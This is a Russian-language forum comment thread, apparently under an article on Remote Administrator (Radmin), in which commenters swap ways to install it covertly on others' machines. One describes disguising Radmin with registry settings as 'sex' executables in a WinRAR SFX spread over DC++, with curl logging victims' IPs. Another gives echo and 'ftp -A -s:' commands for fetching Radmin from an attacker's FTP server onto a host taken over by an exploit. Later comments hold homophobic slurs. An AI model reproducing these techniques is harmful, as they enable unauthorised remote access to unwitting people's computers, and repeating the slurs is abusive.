Remote Administrator: сказка про военную тайну №2
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
DenKot; e-mail: - 2007-10-10 19:34:23.220000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Помоему информативно но бесполезно вся эта инфа есть в мануале по радмину так что глупо ее мусолить. Лучше обсудить как его похачить удаленно. Например сталкнулся я как то с таким случаем. Радмин и шара SMB с одним и тем же паролем а отсюда следствие.(Matrix foreve)
|
|
|
JDat Deface (LV); e-mail: - 2007-10-10 19:34:23.236666
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Dik, blin. Chto za lamerstvo? Ja tokoe prodelival uzhe s goda nazat. Mne nenado bilo nekakix Delfi. Nuzhnie faili i .reg dump stavim v winrar sfx. Otpazhivaem sfx chtob ne mozhno bilo otkritj s winrarom i vsjo. Stavi v svahu sharu v P2P setj (DC++) lechim lamerov i vsjo. P.S.: Ja eishcho dobavil Flash Devki i curl kotorij edjot na moju .php, kotoraja forvardit na sex sait i fiksiruet ego IP. Postavil imja faila sex_blablabla_1.exe etc. Vot i vsjo iskustvo.
|
|
|
JDat Deface (LV); e-mail: - 2007-10-10 19:34:23.253333
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Blin, ruki krivie u menja, vsjo s oshibkami napechatal. :P
|
|
|
Amvis; e-mail: amvis@mail.ru - 2007-10-10 19:34:23.270000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
В последнее время, благодаря бластеру и Welchia, многие юзверы, даже самые ленивые, поставили файрволы, и программы типо радмина и все другие winsock based стали просто бесполезными для целей скрытого доступа. Есть интересное решение проблемы от http://www.packet-sniffer-sdk.com/, насколько я понял, ребята выпустили аналог winsock, который невидим для всех современных файрволов. А по поводу радмина есть еще вариант, из той оперы, когда эксплоитом вы получли root shell на чужом компе с nt-based системой и ломаете голову, как туда залить тот же радмин. Все просто 1. Поднимаете у себя ФТП сервер, куда выкладываете все фалы радмина, плюс файл реестра с настройками. 2. Создаете скрипт для фтп клиента в root shell с помошью команды echo. Например echo cd install >> sсriрt.txt, echo get radmin.exe >> sсriрt.txt, echo bye >> sсriрt.txt. Далее выполняем команду ftp -A -s:sсriрt.txt FTPServerIP … остальное все описано в этой статье =)
|
|
|
schors; e-mail: - 2007-10-10 19:34:23.270000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Я бы ещё всё-таки обратил внимание на отсутсвие элементарной защиты от дурака и перебор.
|
|
|
ELEMENTAL; e-mail: maki@sura.ru - 2007-10-10 19:34:23.283333
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Мне очень понравилась эта статейка, но нельзя бы сюда добавить информацию, без Дельфи, как ещё можно отключить или обмануть этот х[beep]ов RAdmin! буду очень признателен
|
|
|
RE: Remote Administrator: сказка про военную тайну №2 - 2007-10-10 19:34:23.316666
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Таким образом можна зделать ехе файл в него праписать код на отключения пароля, склеить ехе с jpg и выставить на публичный сайт!Ну а дальше сами знаете что.Чесно гаваря я непробывал но думаю это вазможна.
|
|
|
RE: Remote Administrator: сказка про военную тайну №2 - 2008-11-02 02:36:36.923333
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
пидары…
|
|
|
RE: Remote Administrator: сказка про военную тайну №2 - 2011-01-02 15:44:18.400000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Действительно сборище пидаров !!! Тешат своё самолюбие типа я крутой хакер, а на самом деле мудачьё !!!
|
|
|
|
|